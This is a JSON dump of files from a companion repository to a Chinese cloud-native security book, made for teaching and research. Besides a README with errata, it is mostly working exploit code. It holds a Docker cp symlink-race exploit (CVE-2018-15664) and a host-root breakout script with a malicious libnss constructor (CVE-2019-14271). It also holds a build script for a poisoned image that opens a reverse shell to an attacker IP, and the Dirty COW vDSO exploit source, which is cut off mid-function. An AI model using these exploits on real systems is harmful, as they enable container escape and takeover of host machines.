[
  {
    "path": "README.md",
    "content": "# 《云原生安全：攻防实践与体系构建》 Companion Repository\n\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/brant-ruan/cloud-native-security-book/main/images/book.jpg\" width = \"250\" height = \"317\" alt=\"\" />\n</p>\n\nThis repository provides the supplementary materials and companion source code for the book 《云原生安全：攻防实践与体系构建》 (Cloud Native Security: Offensive and Defensive Practice and Security Architecture), for interested readers to study and experiment with.\n\n**All content in this repository is for teaching and research purposes only. Illegal use is strictly forbidden; violators bear all consequences!**\n\nRelated links: [Douban](https://book.douban.com/subject/35640762/) | [JD.com](https://item.jd.com/13495676.html) | [Dangdang](http://product.dangdang.com/29318802.html)\n\n## Supplementary Reading\n\n- [100_云计算简介.pdf](appendix/100_云计算简介.pdf)\n- [101_代码安全.pdf](appendix/101_代码安全.pdf)\n- [200_容器技术.pdf](appendix/200_容器技术.pdf)\n- [201_容器编排.pdf](appendix/201_容器编排.pdf)\n- [202_微服务.pdf](appendix/202_微服务.pdf)\n- [203_服务网格.pdf](appendix/203_服务网格.pdf)\n- [204_DevOps.pdf](appendix/204_DevOps.pdf)\n- [CVE-2017-1002101：突破隔离访问宿主机文件系统.pdf](appendix/CVE-2017-1002101：突破隔离访问宿主机文件系统.pdf)\n- [CVE-2018-1002103：远程代码执行与虚拟机逃逸.pdf](appendix/CVE-2018-1002103：远程代码执行与虚拟机逃逸.pdf)\n- [CVE-2020-8595：Istio认证绕过.pdf](appendix/CVE-2020-8595：Istio认证绕过.pdf)\n- [靶机实验：综合场景下的渗透实战.pdf](appendix/靶机实验：综合场景下的渗透实战.pdf)\n\n## Companion Source Code\n\n|Directory|Description|Location in Book|\n|:-|:-|:-|\n|[0302-开发侧攻击/02-CVE-2018-15664/symlink_race/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race)|Exploit code for CVE-2018-15664|Section 3.2.2|\n|[0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/03-CVE-2019-14271)|Exploit code for CVE-2019-14271|Section 3.2.3|\n|[0303-供应链攻击/01-CVE-2019-5021-alpine/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/01-CVE-2019-5021-alpine)|Example of building a vulnerable image from an Alpine image affected by CVE-2019-5021|Section 3.3.1|\n|[0303-供应链攻击/02-CVE-2016-5195-malicious-image/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/02-CVE-2016-5195-malicious-image)|Example of building an image that exploits CVE-2016-5195|Section 3.3.2|\n|[0304-运行时攻击/01-容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸)|Several code snippets for container escape|Section 3.4.1|\n|[0304-运行时攻击/02-安全容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/02-安全容器逃逸)|Exploit code for escaping secure containers|Section 3.4.2|\n|[0304-运行时攻击/03-资源耗尽型攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/03-资源耗尽型攻击)|Sample code for resource-exhaustion attacks|Section 3.4.3|\n|[0402-Kubernetes组件不安全配置/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0402-Kubernetes组件不安全配置/)|Commands for exploiting insecure Kubernetes component configurations|Section 4.2|\n|[0403-CVE-2018-1002105/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0403-CVE-2018-1002105)|Exploit code for CVE-2018-1002105|Section 4.3|\n|[0404-K8s拒绝服务攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0404-K8s拒绝服务攻击/)|Exploit code for CVE-2019-11253 and CVE-2019-9512|Section 4.4|\n|[0405-云原生网络攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0405-云原生网络攻击/)|Simulated network environment and sample attack code for cloud native man-in-the-middle attacks|Section 4.5|\n\n## Sharing and Discussion\n\nFollow the \"绿盟科技研究通讯\" (NSFOCUS Security Research Newsletter) WeChat official account, where we continuously publish high-quality research on frontier topics in information security:\n\n![Search WeChat for \"绿盟科技研究通讯\"](images/yjtx.png)\n\n## Notes\n\nSome of the source code comes from elsewhere on the Internet and is archived here for readers' convenience. These sources and their origins are:\n\n1. [0302-开发侧攻击/02-CVE-2018-15664/symlink_race](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race): https://seclists.org/oss-sec/2019/q2/131\n2. [0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击): https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/\n3. [0304-运行时攻击/01-容器逃逸/CVE-2016-5195/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195): https://github.com/scumjr/dirtycow-vdso\n4. [0304-运行时攻击/01-容器逃逸/CVE-2019-5736/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736): https://github.com/Frichetten/CVE-2019-5736-PoC\n\nThe referenced projects and code are licensed under their original projects' licenses.\n\nSource code modified by the authors is not listed here; the book cites the source of each such reference, and interested readers can consult those citations.\n\n## Errata and Clarifications\n\n### 1st Edition, 3rd Printing\n\n#### P56 - 3.4.1 Container Escape\n\nSee [issue 9](https://github.com/Metarget/cloud-native-security-book/issues/9).\n\nFuture printings will make two additions and corrections to the text:\n\n1. Explain why `#!/proc/self/exe` is necessary (non-dumpable -> dumpable); CVE-2016-9962 could be mentioned here.\n2. Spell out the context in the attack steps, removing the ambiguity of \"achieving both the overwrite and the shellcode execution within a single runC execution\".\n\nThanks to reader [@XDTG](https://github.com/XDTG) for pointing this out. We will address it in subsequent printings.\n\n#### P44 - 3.3.1 Image Vulnerability Exploitation\n\nSee [issue 8](https://github.com/Metarget/cloud-native-security-book/issues/8).\n\nThe image build command near the bottom of page 44 is incomplete: it omits the build context directory. The correct command is as follows (note the trailing `.`):\n\n```bash\ndocker build --network=host -t alpine:cve-2019-5021 .\n```\n\nThanks to reader [@WAY29](https://github.com/WAY29) for pointing this out. We will fix it in subsequent printings.\n\n#### P42 - 3.2.3 CVE-2019-14271: Loading an Untrusted Dynamic-Link Library\n\nSee [issue 7](https://github.com/Metarget/cloud-native-security-book/issues/7).\n\nThanks to reader [@WAY29](https://github.com/WAY29) for pointing this out. To compile Glibc successfully, configure must be run before make. We will fix it in subsequent printings.\n\n#### P42 - 3.2.3 CVE-2019-14271: Loading an Untrusted Dynamic-Link Library\n\nSee [issue 6](https://github.com/Metarget/cloud-native-security-book/issues/6).\n\nThanks to reader [@XDTG](https://github.com/XDTG) for pointing this out. The steps in the book work as intended, but the approach proposed by [@XDTG](https://github.com/XDTG) is more natural and elegant. After verifying it, we will consider adopting it in subsequent printings.\n\n### 1st Edition, 1st Printing\n\n#### P37 - 3.2.2 CVE-2018-15664: Symlink-Exchange Vulnerability (a clarification; the original text is not wrong)\n\nThe paragraph beginning on the eighth line of the body text is somewhat hard to follow:\n\n> The job of symlink_swap.c is to create, inside the container, a symbolic link pointing to the root directory \"/\", and to keep swapping the names of that symlink (whose path is passed in as a command-line argument, e.g. \"/totally_safe_path\") and a normal directory (e.g. \"/totally_safe_path-stashed\"). This way, when docker cp is executed on the host, if \"/totally_safe_path\" is found to be a normal directory during the initial check but has become a symbolic link by the time the copy is performed, Docker will resolve that symbolic link on the host.\n\nIn fact, inside the container, once the name swapping via renameat2 begins, `/totally_safe_path` and `/totally_safe_path-stashed` are, from our point of view, just two strings, no longer bound to the symlink or the normal directory; only at the moment the swapping stops is it determined again which string refers to which (the symlink or the directory).\n\nSo in the book's passage \"This way, when docker cp is executed on the host, if first...\", the name swapping inside the container has already begun at that point. What the user (or attacker) wants to docker cp is the file or directory named `/totally_safe_path` inside the container (the name suggests a \"totally safe path\"); that is the expectation (or rather, the premise of this scenario). During docker cp's execution, at the check stage the path string `/totally_safe_path` still refers to a normal directory, but by the time of the copy operation, `/totally_safe_path` has been swapped to refer to a symbolic link.\n\nThanks to reader @泡泡球麻麻君 for pointing this out.\n\n#### P85 - 4.2.1 Unauthorized Access to the Kubernetes API Server (fixed in the 1st edition, 3rd printing)\n\nPart of the fourth line from the bottom is ambiguous:\n\n> Then, as long as the network is reachable, an attacker can control the cluster through this port.\n\nIn fact, if only `--insecure-port=8080` is set, the service listens only on `localhost`, and a remote attacker normally cannot reach it, even though it is \"network reachable\" from an IP perspective. Remote control additionally requires setting `--insecure-bind-address=0.0.0.0`.\n\n\"Network reachable\" here is actually meant to cover two situations:\n\n1. The port is directly accessible from outside when `--insecure-bind-address` is set, i.e. the case described above;\n2. localhost can be reached in some other way, which in turn includes:\n    1. a local user leveraging the service on port 8080 to escalate privileges;\n    2. reaching the localhost port remotely via techniques such as SSRF or DNS rebinding.\n"
  },
  {
    "path": "code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/Dockerfile",
    "content": "# Copyright (C) 2018 Aleksa Sarai <asarai@suse.de>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\n# Build the binary.\nFROM opensuse/leap\nRUN zypper in -y gcc glibc-devel-static\nRUN mkdir /builddir\nCOPY symlink_swap.c /builddir/symlink_swap.c\nRUN gcc -Wall -Werror -static -o /builddir/symlink_swap /builddir/symlink_swap.c\n\n# Set up our malicious rootfs.\nFROM opensuse/leap\nARG SYMSWAP_TARGET=/w00t_w00t_im_a_flag\nARG SYMSWAP_PATH=/totally_safe_path\nRUN echo \"FAILED -- INSIDE CONTAINER PATH\" >\"$SYMSWAP_TARGET\"\nCOPY --from=0 /builddir/symlink_swap /symlink_swap\nENTRYPOINT [\"/symlink_swap\"]\n"
  },
  {
    "path": "code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/symlink_swap.c",
    "content": "/*\n * Copyright (C) 2018 Aleksa Sarai <asarai@suse.de>\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program.  If not, see <http://www.gnu.org/licenses/>.\n */\n\n#define _GNU_SOURCE\n#include <fcntl.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/syscall.h>\n#include <unistd.h>\n\n#define usage() \\\n\tdo { printf(\"usage: symlink_swap <symlink>\\n\"); exit(1); } while(0)\n\n#define bail(msg) \\\n\tdo { perror(\"symlink_swap: \" msg); exit(1); } while (0)\n\n/*\n * glibc >= 2.28 ships a renameat2() wrapper; on older glibc, uncomment the\n * raw syscall wrapper below.\n */\n#define RENAME_EXCHANGE (1 << 1)\n/*int renameat2(int olddirfd, const char *oldpath,\n              int newdirfd, const char *newpath, int flags)\n{\n\treturn syscall(__NR_renameat2, olddirfd, oldpath, newdirfd, newpath, flags);\n}*/\n\n/* usage: symlink_swap <symlink> */\nint main(int argc, char **argv)\n{\n\tif (argc != 2)\n\t\tusage();\n\n\tchar *symlink_path = argv[1];\n\tchar *stash_path = NULL;\n\tif (asprintf(&stash_path, \"%s-stashed\", symlink_path) < 0)\n\t\tbail(\"create stash_path\");\n\n\t/* Create a dummy file at symlink_path. 
*/\n\tstruct stat sb = {0};\n\tif (!lstat(symlink_path, &sb)) {\n\t\tint err;\n\t\tif (sb.st_mode & S_IFDIR)\n\t\t\terr = rmdir(symlink_path);\n\t\telse\n\t\t\terr = unlink(symlink_path);\n\t\tif (err < 0)\n\t\t\tbail(\"unlink symlink_path\");\n\t}\n\n\t/*\n\t * Now create a symlink to \"/\" (which will resolve to the host's root if we\n\t * win the race) and a dummy directory at stash_path for us to swap with.\n\t * We use a directory to remove the possibility of ENOTDIR which reduces\n\t * the chance of us winning.\n\t */\n\tif (symlink(\"/\", symlink_path) < 0)\n\t\tbail(\"create symlink_path\");\n\tif (mkdir(stash_path, 0755) < 0)\n\t\tbail(\"mkdir stash_path\");\n\n\t/* Now we do a RENAME_EXCHANGE forever. */\n\tfor (;;) {\n\t\tint err = renameat2(AT_FDCWD, symlink_path,\n\t                        AT_FDCWD, stash_path, RENAME_EXCHANGE);\n\t\tif (err < 0)\n\t\t\tperror(\"symlink_swap: rename exchange failed\");\n\t}\n\treturn 0;\n}\n"
  },
  {
    "path": "code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_read.sh",
    "content": "#!/bin/zsh\n# Copyright (C) 2018 Aleksa Sarai <asarai@suse.de>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\nSYMSWAP_PATH=/totally_safe_path\nSYMSWAP_TARGET=/w00t_w00t_im_a_flag\n\n# Create our flag.\necho \"SUCCESS -- COPIED FROM THE HOST\" | sudo tee \"$SYMSWAP_TARGET\"\nsudo chmod 000 \"$SYMSWAP_TARGET\"\n\n# Build and run the malicious image.\ndocker build -t cyphar/symlink_swap \\\n\t--build-arg \"SYMSWAP_PATH=$SYMSWAP_PATH\" \\\n\t--build-arg \"SYMSWAP_TARGET=$SYMSWAP_TARGET\" build/\nctr_id=$(docker run --rm -d cyphar/symlink_swap \"$SYMSWAP_PATH\")\n\n# Now continually try to copy the files.\nidx=0\nwhile true\ndo\n\tmkdir \"ex${idx}\"\n\tdocker cp \"${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET\" \"ex${idx}/out\"\n\tidx=$(($idx + 1))\ndone\n"
  },
  {
    "path": "code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_write.sh",
    "content": "#!/bin/zsh\n# Copyright (C) 2018 Aleksa Sarai <asarai@suse.de>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\nSYMSWAP_PATH=/totally_safe_path\nSYMSWAP_TARGET=/w00t_w00t_im_a_flag\n\n# Create our flag.\necho \"FAILED -- HOST FILE UNCHANGED\" | sudo tee \"$SYMSWAP_TARGET\"\nsudo chmod 0444 \"$SYMSWAP_TARGET\"\n\n# Build and run the malicious image.\ndocker build -t cyphar/symlink_swap \\\n\t--build-arg \"SYMSWAP_PATH=$SYMSWAP_PATH\" \\\n\t--build-arg \"SYMSWAP_TARGET=$SYMSWAP_TARGET\" build/\nctr_id=$(docker run --rm -d cyphar/symlink_swap \"$SYMSWAP_PATH\")\n\necho \"SUCCESS -- HOST FILE CHANGED\" | tee localpath\n\n# Now continually try to copy the files.\nwhile true\ndo\n\tdocker cp localpath \"${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET\"\ndone\n"
  },
  {
    "path": "code/0302-开发侧攻击/03-CVE-2019-14271/breakout",
    "content": "#!/bin/bash\n\numount /host_fs && rm -rf /host_fs\nmkdir /host_fs\n \n \nmount -t proc none /proc     # mount the host's procfs over /proc\ncd /proc/1/root              # chdir to host's root\nmount --bind . /host_fs      # mount host root at /host_fs"
  },
  {
    "path": "code/0302-开发侧攻击/03-CVE-2019-14271/file-service.c",
    "content": "// content should be added into nss/nss_files/files-service.c\n#include <sys/types.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <string.h>\n#include <stdbool.h>\n#include <sys/wait.h>\n\n#define ORIGINAL_LIBNSS \"/original_libnss_files.so.2\"\n#define LIBNSS_PATH \"/lib/x86_64-linux-gnu/libnss_files.so.2\"\n\nbool is_privileged();\n\n__attribute__ ((constructor)) void run_at_link(void) {\n     char * argv_break[2];\n     if (!is_privileged())\n           return;\n\n     // Put the original libnss_files back so name resolution keeps working\n     rename(ORIGINAL_LIBNSS, LIBNSS_PATH);\n\n     if (!fork()) {\n        // Child runs breakout\n        argv_break[0] = strdup(\"/breakout\");\n        argv_break[1] = NULL;\n        execve(\"/breakout\", argv_break, NULL);\n     }\n     else\n        wait(NULL); // Wait for child\n\n     return;\n}\n\nbool is_privileged() {\n     FILE * proc_file = fopen(\"/proc/self/exe\", \"r\");\n     if (proc_file != NULL) {\n           fclose(proc_file);\n           return false; // can open, so /proc exists; not running as docker-tar\n     }\n     return true; // we're running in the context of docker-tar\n}"
  },
  {
    "path": "code/0303-供应链攻击/01-CVE-2019-5021-alpine/Dockerfile",
    "content": "FROM alpine:3.5\n\nRUN apk add --no-cache shadow\nRUN adduser -S non_root\n\nUSER non_root"
  },
  {
    "path": "code/0303-供应链攻击/02-CVE-2016-5195-malicious-image/build.sh",
    "content": "#!/bin/bash\n\n# modify ATTACKER_IP and ATTACKER_PORT before building\nATTACKER_IP=REVERSE_SHELL_IP\nATTACKER_PORT=REVERSE_SHELL_PORT\n\nTEMP_DIR=./temp-dirtycow\n\nset -e -x\n\n# build ExP\nsudo apt update && sudo apt install -y build-essential nasm\nmkdir -p $TEMP_DIR\ngit clone https://github.com/scumjr/dirtycow-vdso.git $TEMP_DIR\ncd $TEMP_DIR\nmake\ncd ..\n\n# build malicious image\ncat << EOF > ./Dockerfile\nFROM ubuntu:18.04\n\nADD $TEMP_DIR/0xdeadbeef /entrypoint\nRUN chmod u+x /entrypoint\nENTRYPOINT [\"/entrypoint\", \"$ATTACKER_IP:$ATTACKER_PORT\"]\nEOF\n\nsudo docker build -t cve-2016-5195:v1.0 .\n\nrm ./Dockerfile\nrm -rf $TEMP_DIR"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/0xdeadbeef.c",
    "content": "/*\n * CVE-2016-5195 POC\n * -scumjr\n */\n\n#define _GNU_SOURCE\n#include <err.h>\n#include <poll.h>\n#include <errno.h>\n#include <sched.h>\n#include <stdio.h>\n#include <fcntl.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <pthread.h>\n#include <stdbool.h>\n#include <sys/auxv.h>\n#include <sys/mman.h>\n#include <sys/user.h>\n#include <sys/wait.h>\n#include <sys/types.h>\n#include <sys/prctl.h>\n#include <arpa/inet.h>\n#include <sys/ptrace.h>\n#include <sys/socket.h>\n\n#include \"payload.h\"\n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 4096\n#endif\n\n#define PATTERN_IP\t\t\"\\xde\\xc0\\xad\\xde\"\n#define PATTERN_PORT\t\t\"\\x37\\x13\"\n#define PATTERN_PROLOGUE\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n#define PAYLOAD_IP\t\tINADDR_LOOPBACK\n#define PAYLOAD_PORT\t\t1234\n\n#define LOOP\t\t\t0x10000\n#define VDSO_SIZE\t\t(2 * PAGE_SIZE)\n#define ARRAY_SIZE(arr)\t\t(sizeof(arr) / sizeof(arr[0]))\n\ntypedef unsigned int uint32_t;\ntypedef unsigned long uint64_t;\n\nstruct vdso_patch {\n\tunsigned char *patch;\n\tunsigned char *copy;\n\tsize_t size;\n\tvoid *addr;\n};\n\nstruct payload_patch {\n\tconst char *name;\n\tvoid *pattern;\n\tsize_t pattern_size;\n\tvoid *buf;\n\tsize_t size;\n};\n\nstruct prologue {\n\tchar *opcodes;\n\tsize_t size;\n};\n\nstruct mem_arg  {\n\tvoid *vdso_addr;\n\tbool do_patch;\n\tbool stop;\n\tunsigned int patch_number;\n};\n\nstatic char child_stack[8192];\nstatic struct vdso_patch vdso_patch[2];\n\nstatic struct prologue prologues[] = {\n\t/* push rbp; mov rbp, rsp; lfence */\n\t{ \"\\x55\\x48\\x89\\xe5\\x0f\\xae\\xe8\", 7 },\n\t/* push rbp; mov rbp, rsp; push r14 */\n\t{ \"\\x55\\x48\\x89\\xe5\\x41\\x57\", 6 },\n\t/* push rbp; mov rbp, rdi; push rbx */\n\t{ \"\\x55\\x48\\x89\\xfd\\x53\", 5 },\n\t/* push rbp; mov rbp, rsp; xchg rax, rax */\n\t{ \"\\x55\\x48\\x89\\xe5\\x66\\x66\\x90\", 7 },\n\t/* push rbp; cmp edi, 1; mov rbp, rsp */\n\t{ 
\"\\x55\\x83\\xff\\x01\\x48\\x89\\xe5\", 7 },\n};\n\nstatic int writeall(int fd, const void *buf, size_t count)\n{\n\tconst char *p;\n\tssize_t i;\n\n\tp = buf;\n\tdo {\n\t\ti = write(fd, p, count);\n\t\tif (i == 0) {\n\t\t\treturn -1;\n\t\t} else if (i == -1) {\n\t\t\tif (errno == EINTR)\n\t\t\t\tcontinue;\n\t\t\treturn -1;\n\t\t}\n\t\tcount -= i;\n\t\tp += i;\n\t} while (count > 0);\n\n\treturn 0;\n}\n\nstatic void *get_vdso_addr(void)\n{\n\treturn (void *)getauxval(AT_SYSINFO_EHDR);\n}\n\nstatic int ptrace_memcpy(pid_t pid, void *dest, const void *src, size_t n)\n{\n\tconst unsigned char *s;\n\tunsigned long value;\n\tunsigned char *d;\n\n\td = dest;\n\ts = src;\n\n\twhile (n >= sizeof(long)) {\n\t\tmemcpy(&value, s, sizeof(value));\n\t\tif (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {\n\t\t\twarn(\"ptrace(PTRACE_POKETEXT)\");\n\t\t\treturn -1;\n\t\t}\n\n\t\tn -= sizeof(long);\n\t\td += sizeof(long);\n\t\ts += sizeof(long);\n\t}\n\n\tif (n > 0) {\n\t\td -= sizeof(long) - n;\n\n\t\terrno = 0;\n\t\tvalue = ptrace(PTRACE_PEEKTEXT, pid, d, NULL);\n\t\tif (value == -1 && errno != 0) {\n\t\t\twarn(\"ptrace(PTRACE_PEEKTEXT)\");\n\t\t\treturn -1;\n\t\t}\n\n\t\tmemcpy((unsigned char *)&value + sizeof(value) - n, s, n);\n\t\tif (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {\n\t\t\twarn(\"ptrace(PTRACE_POKETEXT)\");\n\t\t\treturn -1;\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nstatic int patch_payload_helper(struct payload_patch *pp)\n{\n\tunsigned char *p;\n\n\tp = memmem(payload, payload_len, pp->pattern, pp->pattern_size);\n\tif (p == NULL) {\n\t\tfprintf(stderr, \"[-] failed to patch payload's %s\\n\", pp->name);\n\t\treturn -1;\n\t}\n\n\tmemcpy(p, pp->buf, pp->size);\n\n\tp = memmem(payload, payload_len, pp->pattern, pp->pattern_size);\n\tif (p != NULL) {\n\t\tfprintf(stderr,\n\t\t\t\"[-] payload's %s pattern was found several times\\n\",\n\t\t\tpp->name);\n\t\treturn -1;\n\t}\n\n\treturn 0;\n}\n\n/*\n * A few bytes of the payload must be patched: prologue, ip, and port.\n 
*/\nstatic int patch_payload(struct prologue *p, uint32_t ip, uint16_t port)\n{\n\tint i;\n\n\tstruct payload_patch payload_patch[] = {\n\t\t{ \"port\", PATTERN_PORT, sizeof(PATTERN_PORT)-1, &port, sizeof(port) },\n\t\t{ \"ip\", PATTERN_IP, sizeof(PATTERN_IP)-1, &ip, sizeof(ip) },\n\t\t{ \"prologue\", PATTERN_PROLOGUE, sizeof(PATTERN_PROLOGUE)-1, p->opcodes, p->size },\n\t};\n\n\tfor (i = 0; i < ARRAY_SIZE(payload_patch); i++) {\n\t\tif (patch_payload_helper(&payload_patch[i]) == -1)\n\t\t\treturn -1;\n\t}\n\n\treturn 0;\n}\n\n/* make a copy of vDSO to restore it later */\nstatic int save_orig_vdso(void)\n{\n\tstruct vdso_patch *p;\n\tint i;\n\n\tfor (i = 0; i < ARRAY_SIZE(vdso_patch); i++) {\n\t\tp = &vdso_patch[i];\n\t\tp->copy = malloc(p->size);\n\t\tif (p->copy == NULL) {\n\t\t\twarn(\"malloc\");\n\t\t\treturn -1;\n\t\t}\n\n\t\tmemcpy(p->copy, p->addr, p->size);\n\t}\n\n\treturn 0;\n}\n\nstatic int build_vdso_patch(void *vdso_addr, struct prologue *prologue)\n{\n\tuint32_t clock_gettime_offset, target;\n\tunsigned long clock_gettime_addr;\n\tunsigned char *p, *buf;\n\tuint64_t entry_point;\n\tint i;\n\n\t/* e_entry */\n\tp = vdso_addr;\n\tentry_point = *(uint64_t *)(p + 0x18);\n\tclock_gettime_offset = (uint32_t)entry_point & 0xfff;\n\tclock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset;\n\n\t/* patch #1: put payload at the end of vdso */\n\tvdso_patch[0].patch = payload;\n\tvdso_patch[0].size = payload_len;\n\tvdso_patch[0].addr = (unsigned char *)vdso_addr + VDSO_SIZE - payload_len;\n\n\tp = vdso_patch[0].addr;\n\tfor (i = 0; i < payload_len; i++) {\n\t\tif (p[i] != '\\x00') {\n\t\t\tfprintf(stderr, \"failed to find a place for the payload\\n\");\n\t\t\treturn -1;\n\t\t}\n\t}\n\n\t/* patch #2: hijack clock_gettime prologue */\n\tbuf = malloc(sizeof(PATTERN_PROLOGUE)-1);\n\tif (buf == NULL) {\n\t\twarn(\"malloc\");\n\t\treturn -1;\n\t}\n\n\t/* craft call to payload */\n\ttarget = VDSO_SIZE - payload_len - clock_gettime_offset;\n\tmemset(buf, 
'\\x90', sizeof(PATTERN_PROLOGUE)-1);\n\tbuf[0] = '\\xe8';\n\t*(uint32_t *)&buf[1] = target - 5;\n\n\tvdso_patch[1].patch = buf;\n\tvdso_patch[1].size = prologue->size;\n\tvdso_patch[1].addr = (unsigned char *)clock_gettime_addr;\n\n\tsave_orig_vdso();\n\n\treturn 0;\n}\n\nstatic int backdoor_vdso(pid_t pid, unsigned int patch_number)\n{\n\tstruct vdso_patch *p;\n\n\tp = &vdso_patch[patch_number];\n\treturn ptrace_memcpy(pid, p->addr, p->patch, p->size);\n}\n\nstatic int restore_vdso(pid_t pid, unsigned int patch_number)\n{\n\tstruct vdso_patch *p;\n\n\tp = &vdso_patch[patch_number];\n\treturn ptrace_memcpy(pid, p->addr, p->copy, p->size);\n}\n\n/*\n * Check if vDSO is entirely patched. This function is executed in a different\n * memory space thanks to fork(). Return 0 on success, 1 otherwise.\n */\nstatic void check(struct mem_arg *arg)\n{\n\tstruct vdso_patch *p;\n\tvoid *src;\n\tint i, ret;\n\n\tp = &vdso_patch[arg->patch_number];\n\tsrc = arg->do_patch ? p->patch : p->copy;\n\n\tret = 1;\n\tfor (i = 0; i < LOOP; i++) {\n\t\tif (memcmp(p->addr, src, p->size) == 0) {\n\t\t\tret = 0;\n\t\t\tbreak;\n\t\t}\n\n\t\tusleep(100);\n\t}\n\n\texit(ret);\n}\n\nstatic void *madviseThread(void *arg_)\n{\n\tstruct mem_arg *arg;\n\n\targ = (struct mem_arg *)arg_;\n\twhile (!arg->stop) {\n\t\tif (madvise(arg->vdso_addr, VDSO_SIZE, MADV_DONTNEED) == -1) {\n\t\t\twarn(\"madvise\");\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nstatic int debuggee(void *arg_)\n{\n\tif (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) == -1)\n\t\terr(1, \"prctl(PR_SET_PDEATHSIG)\");\n\n\tif (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)\n\t\terr(1, \"ptrace(PTRACE_TRACEME)\");\n\n\tkill(getpid(), SIGSTOP);\n\n\treturn 0;\n}\n\n/* use ptrace to write to read-only mappings */\nstatic void *ptrace_thread(void *arg_)\n{\n\tint flags, ret2, status;\n\tstruct mem_arg *arg;\n\tpid_t pid;\n\tvoid *ret;\n\n\targ = (struct mem_arg *)arg_;\n\n\tflags = CLONE_VM|CLONE_PTRACE;\n\tpid = clone(debuggee, child_stack + 
